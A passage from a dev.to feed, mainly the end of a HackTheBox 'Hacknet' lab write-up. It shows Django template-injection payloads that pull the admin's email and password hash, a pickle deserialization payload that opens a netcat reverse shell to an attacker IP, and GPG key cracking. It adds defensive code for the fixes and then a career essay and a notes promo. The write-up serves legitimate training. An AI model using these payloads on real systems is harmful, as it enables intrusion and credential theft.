&lt;p&gt;We identify a classic sink: the &lt;strong&gt;Username&lt;/strong&gt; field. However, the injection doesn’t trigger immediately on the main profile view. It triggers only when viewing the /likes/{id} endpoint. This is a lesson in &lt;strong&gt;Context Discovery,&lt;/strong&gt; understanding that data flows through multiple templates, some more secure than others.&lt;/p&gt;

&lt;p&gt;The application uses a Python template engine that renders user input as template source rather than as data (the dotted lookup syntax &lt;code&gt;users.0.email&lt;/code&gt; that works below, and the &lt;code&gt;django_cache&lt;/code&gt; directory seen later, point to Django). This allows us to inject Server-Side Template Injection (SSTI) payloads.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;The Payload Strategy:&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;We input {{ 7*7 }}. If the page renders 49, the input reached an engine that evaluates expressions (Jinja2 does). Django's engine does no arithmetic, so there the tell is different: a server error or an empty render where the username should be, followed by a dotted lookup such as {{ users.0.username }} coming back with real data.&lt;/p&gt;

&lt;p&gt;We don’t just want a shell; we want data. We use the template engine to introspect the users object array.&lt;/p&gt;

&lt;p&gt;Instead of brute-forcing a login, we query index 0 of the user array (users.0). In most databases, the first user created is the Administrator.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;# Verification Payload (Username field)
{{ 7*7 }}
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;# Recon Payload (Dump object values)
{{ users.values }}

# Exfiltration Payload (Targeting the Admin)
{{ users.0.email }}
{{ users.0.password }}
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;
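&lt;p&gt;How the payloads above actually reach the password field, as an added example that is not code from Hacknet or from Django: this reimplements the dotted-variable lookup Django's template engine performs (dictionary key, then attribute, then integer index, calling any callable it lands on unless it is flagged alters_data) and renders the vulnerable pattern next to its fix. The User rows and the FakeQuerySet are constructed sample data.&lt;/p&gt;

```python
"""Added example, not code from Hacknet or from Django. It reimplements the
dotted-variable lookup Django's engine performs for {{ users.0.password }}
so the data flow behind the payloads above is visible, beside the fix."""
import re
from dataclasses import dataclass

VARIABLE = re.compile(r"\{\{\s*([\w.]+)\s*\}\}")


def resolve_lookup(path, context):
    """Same order of attempts as Django's Variable._resolve_lookup."""
    current = context
    for bit in path.split("."):
        try:
            current = current[bit]                    # 1. dictionary key
        except (TypeError, AttributeError, KeyError, ValueError, IndexError):
            try:
                current = getattr(current, bit)       # 2. attribute / method
            except (TypeError, AttributeError):
                try:
                    current = current[int(bit)]       # 3. list index
                except (IndexError, ValueError, KeyError, TypeError):
                    return ""                          # Django: string_if_invalid
        if callable(current):
            if getattr(current, "alters_data", False):
                return ""                              # Django refuses to call these
            current = current()                       # everything else gets called
    return current


def render(source, context):
    """Substitute every {{ var.path }} found in the template *source*."""
    return VARIABLE.sub(lambda m: str(resolve_lookup(m.group(1), context)), source)


@dataclass
class User:
    username: str
    email: str
    password: str          # the stored hash; constructed values below


class FakeQuerySet(list):
    """Stand-in for a Django QuerySet: a list with .values() and .delete()."""
    def values(self):
        return [vars(u) for u in self]

    def delete(self):
        self.clear()
    delete.alters_data = True      # the flag Django checks before calling


USERS = FakeQuerySet([             # constructed sample rows
    User("admin", "admin@hacknet.htb", "pbkdf2_sha256$constructed$admin"),
    User("alice", "alice@hacknet.htb", "pbkdf2_sha256$constructed$alice"),
])


def likes_page_vulnerable(username):
    """The bug on the box: the username is spliced into the template source,
    so any {{ }} inside it is resolved against the request context."""
    source = "<p>Liked by " + username + "</p>"
    return render(source, {"users": USERS})


def likes_page_fixed(username):
    """The fix: the username is context data; the source is a constant."""
    return render("<p>Liked by {{ name }}</p>", {"name": username, "users": USERS})


if __name__ == "__main__":
    for probe in ("{{ users.0.email }}", "{{ users.0.password }}",
                  "{{ users.values }}", "{{ users.delete }}"):
        print(probe, "->", likes_page_vulnerable(probe))
    print("fixed ->", likes_page_fixed("{{ users.0.password }}"))
```

&lt;p&gt;Like Django's engine, this one does no arithmetic, which is why {{ 7*7 }} comes back unchanged here and the dotted probes are the reliable tell. The fix is not escaping: it is that the username is context data substituted once, never template source, so the braces it contains are inert text. HTML-escaping that text on output is a separate, also necessary, step against XSS.&lt;/p&gt;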

&lt;h3&gt;
  
  
  Phase 3: Race Conditions &amp;amp; Serialization
&lt;/h3&gt;

&lt;p&gt;Gaining a foothold as a low-privileged user is only half the battle. The privilege escalation phase shifts gears to &lt;strong&gt;Linux System Internals&lt;/strong&gt;.&lt;/p&gt;

&lt;p&gt;We discover a root-privileged process that interacts with the /var/tmp directory. This process is running a cleanup script that deletes cache files. However, it blindly deserializes the contents of files in this directory using Python's pickle module. This creates a &lt;strong&gt;Race Condition&lt;/strong&gt;.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;The Vulnerability:&lt;/strong&gt; The root process trusts that files in /var/tmp are valid cache files. It reads them and deserializes them. If we can plant a malicious serialized object (a "pickle bomb") and name it correctly right before the script processes it, the root user executes our code.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;The Exploit Pattern:&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Monitor:&lt;/strong&gt; Use watch to see when the cleanup script runs.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Weaponize:&lt;/strong&gt; Create a Python script that generates a pickled object containing a reverse shell payload.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Race:&lt;/strong&gt; Run a loop that constantly writes this malicious file to /var/tmp, hoping to catch the root process mid-execution.&lt;br&gt;
&lt;/p&gt;
&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;# File System Forensics (Watch for cadence)
watch -n 1 'ls -ltr /var/tmp/django_cache'
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;# The Pickle Payload Logic (Python): unpickling calls os.system(cmd) in the root process
import os, pickle
class Exploit(object):
    def __reduce__(self):
        return (os.system, ('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2&amp;gt;&amp;amp;1|nc 10.10.14.x 4444 &amp;gt;/tmp/f',))
with open('payload', 'wb') as f:   # name it like the cache files the cleanup script expects
    pickle.dump(Exploit(), f)
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;
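&lt;p&gt;The privilege-escalation bug class above, as an added example that is neither the Hacknet cleanup script nor Django's file cache: a privileged job that pickle.load()s whatever it finds in a shared directory, next to a loader that refuses anything it did not write itself. The planted payload has the same __reduce__ shape as the one above but creates a directory instead of calling os.system, so the side effect is visible and harmless; the HMAC key, file names and cache rows are constructed for the demo.&lt;/p&gt;

```python
"""Added example, not the Hacknet cleanup script or Django's FileBasedCache.
A privileged job that unpickles files from a shared directory, beside a
loader that verifies ownership and an HMAC and never touches pickle."""
import hashlib
import hmac
import json
import os
import pickle
import stat
import tempfile


class Planted:
    """Same shape as the box's __reduce__ payload. The real one returns
    (os.system, (reverse_shell,)); this one creates a directory instead."""
    def __init__(self, marker_dir):
        self.marker_dir = marker_dir

    def __reduce__(self):
        return (os.mkdir, (self.marker_dir,))


def cleanup_vulnerable(cache_dir):
    """The pattern on the box: every file in the directory is unpickled as-is."""
    loaded = []
    for name in sorted(os.listdir(cache_dir)):
        with open(os.path.join(cache_dir, name), "rb") as fh:
            loaded.append(pickle.load(fh))   # attacker bytes: the callable runs here
    return loaded


SECRET = b"constructed-demo-key"   # assumption: a real service keeps this outside the shared dir


def write_entry_safe(cache_dir, name, value):
    """Writer: JSON body plus HMAC tag, mode 0600, created only if absent."""
    body = json.dumps(value).encode()
    tag = hmac.new(SECRET, body, hashlib.sha256).hexdigest().encode()
    fd = os.open(os.path.join(cache_dir, name), os.O_WRONLY | os.O_CREAT | os.O_EXCL, 0o600)
    with os.fdopen(fd, "wb") as fh:
        fh.write(tag + b"\n" + body)


def cleanup_safe(cache_dir):
    """Reader: no symlinks, no foreign owners, no unverified bytes, no pickle."""
    loaded, rejected = [], []
    for name in sorted(os.listdir(cache_dir)):
        path = os.path.join(cache_dir, name)
        try:
            fd = os.open(path, os.O_RDONLY | os.O_NOFOLLOW)
        except OSError:                  # symlink (ELOOP) or vanished mid-race
            rejected.append(name)
            continue
        with os.fdopen(fd, "rb") as fh:
            st = os.fstat(fd)            # fstat the open fd, not the path: no TOCTOU
            if not stat.S_ISREG(st.st_mode) or st.st_uid != os.getuid():
                rejected.append(name)
                continue
            tag, _, body = fh.read().partition(b"\n")
            expect = hmac.new(SECRET, body, hashlib.sha256).hexdigest().encode()
            if not hmac.compare_digest(tag, expect):
                rejected.append(name)
                continue
            loaded.append(json.loads(body))
    return loaded, rejected


def run_demo():
    """Plant a payload beside a legitimate entry and run both cleaners.
    Returns (payload_ran_under_vulnerable, safe_loaded, safe_rejected)."""
    base = tempfile.mkdtemp()
    vuln_dir, safe_dir, marker = (os.path.join(base, d) for d in ("vuln", "safe", "marker"))
    os.mkdir(vuln_dir)
    os.mkdir(safe_dir)
    try:
        with open(os.path.join(vuln_dir, "a1b2.cache"), "wb") as fh:
            pickle.dump({"user": "alice", "likes": 3}, fh)   # a genuine pickled entry
        with open(os.path.join(vuln_dir, "zz.cache"), "wb") as fh:
            pickle.dump(Planted(marker), fh)                  # the file the race writes
        cleanup_vulnerable(vuln_dir)
        executed = os.path.isdir(marker)

        write_entry_safe(safe_dir, "a1b2.cache", {"user": "alice", "likes": 3})
        with open(os.path.join(safe_dir, "zz.cache"), "wb") as fh:
            pickle.dump(Planted(marker + "2"), fh)
        safe_loaded, safe_rejected = cleanup_safe(safe_dir)
    finally:
        for d in (vuln_dir, safe_dir):
            for n in os.listdir(d):
                os.unlink(os.path.join(d, n))
            os.rmdir(d)
        for m in (marker, marker + "2"):
            if os.path.isdir(m):
                os.rmdir(m)
        os.rmdir(base)
    return executed, safe_loaded, safe_rejected


if __name__ == "__main__":
    print(run_demo())
```

&lt;p&gt;The safe loader stacks four independent checks, and the demo is arranged so that only the last one catches the planted file: it is a regular file, it is owned by the running user, it opens without following a symlink, and yet its HMAC does not verify. On the box the ownership check alone would have ended the attack, since the attacker's file is not root-owned; the signature is what protects you when the writer and the attacker share a uid.&lt;/p&gt;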


&lt;p&gt;&lt;strong&gt;Expert Insight:&lt;/strong&gt;&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;&lt;em&gt;Tools like&lt;/em&gt; &lt;strong&gt;&lt;em&gt;LinPEAS&lt;/em&gt;&lt;/strong&gt; &lt;em&gt;are invaluable here, but you must know how to read them. Ignore the CVE suggestions.&lt;/em&gt;&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h3&gt;
  
  
  Phase 4: Post-Exploitation Forensics
&lt;/h3&gt;

&lt;p&gt;Getting root is the beginning of the looting phase. We find GPG-encrypted artifacts.&lt;/p&gt;

&lt;p&gt;This mimics a real-world engagement where credentials are often secured but accessible to admins.&lt;/p&gt;

&lt;p&gt;

&lt;/p&gt;
&lt;div class="crayons-card c-embed text-styles text-styles--secondary"&gt;
    &lt;div class="c-embed__content"&gt;
        &lt;div class="c-embed__cover"&gt;
          &lt;a href="https://buymeacoffee.com/notescatalog/e/390668" class="c-link align-middle" rel="noopener noreferrer"&gt;
            &lt;img alt="" src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fimg.buymeacoffee.com%2Fapi%2F%3Fextras%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%3D" height="auto" class="m-0"&gt;
          &lt;/a&gt;
        &lt;/div&gt;
      &lt;div class="c-embed__body"&gt;
        &lt;h2 class="fs-xl lh-tight"&gt;
          &lt;a href="https://buymeacoffee.com/notescatalog/e/390668" rel="noopener noreferrer" class="c-link"&gt;
            HackTheBox Certified Web Exploitation Specialist (HTB CWES) Notes (Unofficial) - Buymeacoffee
          &lt;/a&gt;
        &lt;/h2&gt;
          &lt;p class="truncate-at-3"&gt;
            Welcome to the HTB Certified Web Exploitation Specialist (HTB CWES) Guide. Whether you’re just starting your journey in ethical hacking or looking to refine your existing skills, this resource is stru
          &lt;/p&gt;
        &lt;div class="color-secondary fs-s flex items-center"&gt;
            &lt;img alt="favicon" class="c-embed__favicon m-0 mr-2 radius-0" src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fcdn.buymeacoffee.com%2Fuploads%2Fprofile_pictures%2F2024%2F08%2FZM833oVaI4yezrXw.png%401f.png"&gt;
          buymeacoffee.com
        &lt;/div&gt;
      &lt;/div&gt;
    &lt;/div&gt;
&lt;/div&gt;





&lt;p&gt;&lt;strong&gt;The Workflow:&lt;/strong&gt;&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;
&lt;strong&gt;Exfiltrate&lt;/strong&gt; the armored key and the encrypted backup.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Convert&lt;/strong&gt; the key to a hash using gpg2john.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Crack&lt;/strong&gt; the hash with John the Ripper to get the passphrase.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Decrypt&lt;/strong&gt; the backup to find hardcoded secrets.
&lt;/li&gt;
&lt;/ol&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;# Convert Key for Cracking
gpg2john armored_key.asc &amp;gt; hash
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;





&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;# Import &amp;amp; Decrypt
gpg --import armored_key.asc
gpg --decrypt backup.sql.gpg
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;

  &lt;iframe src="https://www.youtube.com/embed/QtMFd_k9aAg"&gt;
  &lt;/iframe&gt;


&lt;/p&gt;

&lt;h3&gt;
  
  
  Why SSTI Was the Silent Killer of 2025
&lt;/h3&gt;

&lt;p&gt;While the industry obsessed over AI hallucinations and memory safety in 2025, &lt;strong&gt;Server-Side Template Injection (SSTI)&lt;/strong&gt; quietly returned to become a primary vector for cloud compromise.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;1. The Glue Code Problem&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;The biggest revelation was that AI pipelines are built on old foundations. Vulnerabilities like &lt;strong&gt;CVE-2025-25362&lt;/strong&gt; (the spacy-llm incident) showed that widely used NLP libraries were taking user prompts and passing them directly into template engines to format them for LLMs. Attackers injected a payload that the underlying Python service executed.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;2. CMS Fatigue&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Major platforms like &lt;strong&gt;Craft CMS&lt;/strong&gt; and &lt;strong&gt;Grav&lt;/strong&gt; suffered critical failures where the template sandboxes (like Twig) were bypassed. Marketing teams demanded dynamic content, and developers obliged by exposing raw template engines, leading to massive ransomware events in the retail sector.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;3. The Cloud Pivot&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;In 2025, an SSTI owns the cloud. Attackers use the RCE to land in a container, query the internal metadata service (IMDS), steal the IAM role, and pivot to S3 buckets or infrastructure destruction.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Expert Insight:&lt;/strong&gt;&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;&lt;em&gt;Template engines are effectively&lt;/em&gt; eval() &lt;em&gt;functions with better PR. The 'Mean Time to Innocence' for SSTI is zero.&lt;/em&gt;&lt;/p&gt;
&lt;/blockquote&gt;

&lt;h3&gt;
  
  
  Certification Roadmap
&lt;/h3&gt;

&lt;p&gt;Hacknet is a simulator for high-level certifications.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;OSWE (OffSec Web Expert):&lt;/strong&gt; The requirement to identify/exploit SSTI and interact with backend Python objects is core curriculum.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;OSEP (&lt;/strong&gt;&lt;a href="https://buymeacoffee.com/notescatalog/e/371794" rel="noopener noreferrer"&gt;&lt;strong&gt;OffSec Experienced Penetration Tester&lt;/strong&gt;&lt;/a&gt;&lt;strong&gt;):&lt;/strong&gt; The focus on Linux post-exploitation, custom timers, and race conditions aligns perfectly.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;eWPTX:&lt;/strong&gt; Advanced serialization attacks and template injection are heavy features of this exam.&lt;/p&gt;

</description>
      <category>security</category>
      <category>cybersecurity</category>
    </item>
    <item>
      <title>Why I Quit Chasing The Cyber Security Dream</title>
      <dc:creator>Motasem Hamdan</dc:creator>
      <pubDate>Wed, 04 Feb 2026 16:42:10 +0000</pubDate>
      <link>https://dev.to/motasem_hamdan_9c56098a7e/why-i-quit-chasing-the-cyber-security-dream-228k</link>
      <guid>https://dev.to/motasem_hamdan_9c56098a7e/why-i-quit-chasing-the-cyber-security-dream-228k</guid>
      <description>&lt;p&gt;In this article, I pull back the curtain on cybersecurity and strip away the polished image many outsiders imagine. It’s not all digital heroism and fast-paced hacks. Whether you’re part of the blue team defending networks or the red team probing for weak spots, the reality looks more like late night shifts, eyes blurred from logs, constant stress, and a sense that you’re always chasing shadows.&lt;/p&gt;

&lt;p&gt;The job asks for patience and the kind of focus that makes your head hurt. It’s about combing through layers of code, interpreting patterns, and staying alert in ways most people never see. Not for those looking for thrills alone, this path’s more grind than glory.&lt;/p&gt;

&lt;p&gt;For years, I pursued the cybersecurity dream, immersed in code, certifications, and the constant chase for the next big role. But somewhere along the way, I lost sight of why I started. The pressure to stay relevant, the burnout, the imposter syndrome, it all became too much.&lt;/p&gt;

&lt;p&gt;So I stepped back. Not because I failed, but because I realized success isn’t just about titles or tech stacks. It’s about alignment, purpose, and peace.&lt;/p&gt;


&lt;div class="crayons-card c-embed text-styles text-styles--secondary"&gt;
    &lt;div class="c-embed__content"&gt;
        &lt;div class="c-embed__cover"&gt;
          &lt;a href="https://shop.motasem-notes.net/collections/cyber-security-study-notes" class="c-link align-middle" rel="noopener noreferrer"&gt;
            &lt;img alt="" src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fimgproxy.fourthwall.com%2Ft_KHmYNmdqdoMvD1lXflKDJC7qCTqaR-pcqwPcm97g4%2Fw%3A1200%2Fsm%3A1%2Fenc%2FWAAA9kVHnN_elQFL%2FfYcZxdXIt4Gyq4B0%2F7nVf1J_LR6lQICwJ%2F17tVfG2_qwMIZ7sD%2FpTQjVcX1M7Ion69o%2FOi2j2ODFZ3tYe_Td%2FCa8W6F0GDQY_Jz3l%2FWmxTsdLZMfmKNw5Q%2FxNZLY7BIJcsNyKR2%2Foe05z3yX5tutJWHb%2FNJRg1NU8017h_6ky%2FaQ8_6BOb6_lN0rrS%2Fph_FZWZpFAtJb66p%2F3IgRwQ" height="1600" class="m-0" width="1200"&gt;
          &lt;/a&gt;
        &lt;/div&gt;
      &lt;div class="c-embed__body"&gt;
        &lt;h2 class="fs-xl lh-tight"&gt;
          &lt;a href="https://shop.motasem-notes.net/collections/cyber-security-study-notes" rel="noopener noreferrer" class="c-link"&gt;
            Cyber Security Certification Study Notes | The MasterMind Notes / Motasem Hamdan
          &lt;/a&gt;
        &lt;/h2&gt;
          &lt;p class="truncate-at-3"&gt;
            The official Cyber Security Certification Study Notes collection for The MasterMind Notes / Motasem Hamdan. Shop products like: Offensive Security Web Expert (OSWE) Study Notes (Unofficial) and Burp Suite Guide, TryHackMe PT1 Study Notes (Unofficial), and more.
          &lt;/p&gt;
        &lt;div class="color-secondary fs-s flex items-center"&gt;
            &lt;img alt="favicon" class="c-embed__favicon m-0 mr-2 radius-0" src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fimgproxy.fourthwall.com%2FFJqqpShALvXlMqWPo8tKb-LuD974ARrBgzxw_9OChZ4%2Fs%3A96%3A96%2Fsm%3A1%2Fenc%2FbE1WsNBEuZizd6l9%2FKw-Z-lFulBPL1GC5%2FgqPvpMWwKyKQS6BK%2FYXDsapRqLlrJyMew%2Fx4v8DUBDfFn88lvz%2FB8GWQKFUb75Z3BAP%2F9XcbYkA0cZciwG86%2FLPdkiQ1EjE8eC7FP%2F9x1PYgzk7rsXBEWp%2Fv65cQVflX20AgXOV%2FBDpNXcsN6nzs2sYU%2FcXB7cxvkmou3OEAt%2Fu_2AstgJmMfsg2Wv%2FGu8ZwRrbbzEeZSkg%2FHMB2D6KHCPJYicvB%2Fr1HiEVwR7gvQlZ-L" width="96" height="96"&gt;
          shop.motasem-notes.net
        &lt;/div&gt;
      &lt;/div&gt;
    &lt;/div&gt;
&lt;/div&gt;


&lt;h2&gt;
  
  
  Mental Toll is Real
&lt;/h2&gt;

&lt;p&gt;Okay, I will open up about how deeply cybersecurity work can take a toll, not just mentally but physically too. Years spent bouncing between blue team defense and red team offense wore me down.&lt;/p&gt;

&lt;p&gt;Burnout didn’t show up all at once. It crept in slowly, building over time until it became impossible to ignore. The stress, the nonstop pressure, and the demanding pace eventually pushed me to step back for good. Changing how I use my cybersecurity knowledge wasn’t an easy call, but it turned out to be necessary.&lt;/p&gt;

&lt;p&gt;Choosing my health meant giving up a job I’d invested years into. Still, I moved forward, chasing a life with more balance and peace, even if it meant starting over.&lt;/p&gt;

&lt;p&gt;I genuinely enjoyed the technical side of it all, but five years in, the stress just wore me down. No matter how much I tried to power through, it started bleeding into other parts of my life. The sleep got worse, workouts took a hit, and eventually, I had to ask myself if the high pay was worth feeling that wrecked every day.&lt;/p&gt;

&lt;p&gt;In the end, I chose my health. Regular swimming, lifting weights, martial arts, those became my therapy. I walked away from a stressful job because, in my words, no paycheck is worth your peace of mind. My message for people thinking about getting into cybersecurity is pretty clear: it’s not just a career choice. It’s a lifestyle. You’ve got to ask yourself if you’re ready to carry that weight day in and day out.&lt;/p&gt;

&lt;p&gt;Cybersecurity Certificates can help, sure, especially well-regarded ones like &lt;a href="https://buymeacoffee.com/notescatalog/e/183200" rel="noopener noreferrer"&gt;CompTIA Security+&lt;/a&gt; or &lt;a href="https://buymeacoffee.com/notescatalog/e/165578" rel="noopener noreferrer"&gt;OSCP&lt;/a&gt;. They show you’ve got foundational knowledge or hands-on skills.&lt;/p&gt;

&lt;p&gt;But in my view, they aren’t everything. What really sticks out? The work you’ve done, the things you’ve built, and how you talk about it. Actual projects and experience tell a much louder story than a list of acronyms on a résumé. Plus, interviews matter. A lot. How you explain your process, your role in a project, the way you solve problems, all of that carries more weight than just collecting more paper. At some point, certificates start looking more like padding than proof.&lt;/p&gt;


&lt;div class="crayons-card c-embed text-styles text-styles--secondary"&gt;
    &lt;div class="c-embed__content"&gt;
        &lt;div class="c-embed__cover"&gt;
          &lt;a href="https://buymeacoffee.com/notescatalog/extras" class="c-link align-middle" rel="noopener noreferrer"&gt;
            &lt;img alt="" src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fcdn.buymeacoffee.com%2Fopengraph%2Fimages%2F1730588%2F1%2Fog_9630827_1765478408.jpg" height="450" class="m-0" width="800"&gt;
          &lt;/a&gt;
        &lt;/div&gt;
      &lt;div class="c-embed__body"&gt;
        &lt;h2 class="fs-xl lh-tight"&gt;
          &lt;a href="https://buymeacoffee.com/notescatalog/extras" rel="noopener noreferrer" class="c-link"&gt;
            Extras | The MasterMinds Notes - Buymeacoffee
          &lt;/a&gt;
        &lt;/h2&gt;
          &lt;p class="truncate-at-3"&gt;
            AboutCyber Security Notes &amp;amp;amp; CoursesContactconsultation@motasem-notes.netProduct's Legal &amp;amp;amp; TOS InfoPlease read all terms of service and legal information about the products from hereReviews and
          &lt;/p&gt;
        &lt;div class="color-secondary fs-s flex items-center"&gt;
            &lt;img alt="favicon" class="c-embed__favicon m-0 mr-2 radius-0" src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fcdn.buymeacoffee.com%2Fuploads%2Fprofile_pictures%2F2024%2F08%2FZM833oVaI4yezrXw.png%401f.png" width="200" height="200"&gt;
          buymeacoffee.com
        &lt;/div&gt;
      &lt;/div&gt;
    &lt;/div&gt;
&lt;/div&gt;


&lt;h2&gt;
  
  
  Networking Over Certs
&lt;/h2&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fmiro.medium.com%2Fv2%2Fresize%3Afit%3A721%2F0%2AyNrrapTnWc4lB6FN" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fmiro.medium.com%2Fv2%2Fresize%3Afit%3A721%2F0%2AyNrrapTnWc4lB6FN" width="721" height="406"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Building a professional network isn’t just helpful, it’s essential. While certifications can polish your résumé, real progress often comes through people. Platforms like LinkedIn and GitHub aren’t just digital portfolios; they’re modern meeting spots. They show what you’ve built and who you’re connected to. Employers scroll those pages as much as résumés now.&lt;/p&gt;

&lt;p&gt;Going to industry conferences, joining online communities, or even jumping into comment sections can quietly open doors. These are places where quiet introductions turn into long-term opportunities. It’s not always about who’s the loudest or most impressive, just being present and consistent matters.&lt;/p&gt;

&lt;p&gt;Making friends in your field, helping out when you can, and showing genuine interest creates something a certification can’t, a sense of trust. And when people trust you, they think of you when new jobs or projects pop up.&lt;/p&gt;

&lt;p&gt;So while certifications prove you know something, your network is what gets you the call back.&lt;/p&gt;

&lt;h2&gt;
  
  
  Learning Resources Are Often Misleading
&lt;/h2&gt;

&lt;p&gt;A lot of content out there on cybersecurity isn’t really meant to teach. It’s more about getting clicks or boosting someone’s name. That’s why it’s so important to stay sharp and not take everything at face value. Just because something’s popular doesn’t mean it’s solid. Some tutorials or courses might cover the basics or even sound convincing, but they can leave you with a false sense of confidence.&lt;/p&gt;

&lt;p&gt;If you really care about learning, you’ve got to look beyond what’s trending. Double-check where the info comes from. Don’t just rely on the first YouTube video or blog post you find. Trust is earned, not assumed. Keep reading. Keep asking questions. Stay curious. This field changes fast, and the only way to keep up is to keep pushing yourself.&lt;/p&gt;

&lt;p&gt;That’s how you actually get good, by never settling for surface-level knowledge.&lt;/p&gt;

&lt;h2&gt;
  
  
  Alternative Career Paths
&lt;/h2&gt;

&lt;p&gt;Traditional jobs aren’t the only route anymore. You’ve got people carving out paths through freelancing, making content online, or even building something big like a cybersecurity academy.&lt;/p&gt;

&lt;p&gt;But those options take more than just being good at what you do. They demand a steady hand and serious drive. No one’s standing over your shoulder keeping you on track.&lt;/p&gt;

&lt;p&gt;You’ve gotta manage your time, keep learning, push through when things stall, and find your own rhythm, day in, day out. It’s like building your own boat and sailing it too. You learn fast whether you’re cut out for the sea.&lt;/p&gt;

&lt;p&gt;Video&lt;/p&gt;

&lt;p&gt;&lt;iframe width="710" height="399" src="https://www.youtube.com/embed/zZi1fm-Dg0I"&gt;
&lt;/iframe&gt;
&lt;/p&gt;

</description>
      <category>career</category>
      <category>security</category>
      <category>cybersecurity</category>
      <category>techtalks</category>
    </item>
    <item>
      <title>Ultimate HTB CPTS 2026 Notes: The Complete Study Guide</title>
      <dc:creator>Motasem Hamdan</dc:creator>
      <pubDate>Wed, 04 Feb 2026 16:25:54 +0000</pubDate>
      <link>https://dev.to/motasem_hamdan_9c56098a7e/ultimate-htb-cpts-2026-notes-the-complete-study-guide-440a</link>
      <guid>https://dev.to/motasem_hamdan_9c56098a7e/ultimate-htb-cpts-2026-notes-the-complete-study-guide-440a</guid>
      <description>&lt;p&gt;If you are rigorously preparing for the HackTheBox Certified Penetration Testing Specialist certification, having a centralized and exhaustive resource is non-negotiable. These &lt;strong&gt;HTB CPTS Notes&lt;/strong&gt; serve as the definitive "Mastermind" companion, meticulously compiling over 700 pages of critical enumeration techniques, exploitation methodologies, and post-exploitation strategies.&lt;/p&gt;

&lt;p&gt;Unlike scattered blog posts or fragmented wiki pages, this guide consolidates the entire penetration testing lifecycle from initial information gathering to complex Active Directory attacks into a single, cohesive workflow. Whether you are struggling with specific protocol enumeration or need a structured approach to the 10-day practical exam, these notes provide the technical depth and command-line precision required to pass.&lt;/p&gt;

&lt;h3&gt;
  
  
  Comprehensive Information Gathering &amp;amp; Network Enumeration
&lt;/h3&gt;

&lt;p&gt;Success in the CPTS exam hinges on the ability to discover the unseen. The &lt;strong&gt;HTB CPTS Notes&lt;/strong&gt; begin with a deep dive into active information gathering, offering far more than just basic Nmap syntax.&lt;/p&gt;

&lt;p&gt;The guide details advanced scanning techniques, including firewall and IDS/IPS evasion using decoys and fragmented packets, ensuring you can map networks even in hostile environments. It provides extensive cheat sheets for enumerating essential protocols such as SMB, SNMP, NFS, and MySQL, alongside specialized tools like &lt;code&gt;enum4linux&lt;/code&gt;, &lt;code&gt;snmpwalk&lt;/code&gt;, and &lt;code&gt;rpcclient&lt;/code&gt;. By mastering these enumeration steps, you ensure that no service is left unchecked, creating a solid foundation for the exploitation phase.&lt;/p&gt;

&lt;h3&gt;
  
  
  Deep Dive into Active Directory Exploitation
&lt;/h3&gt;

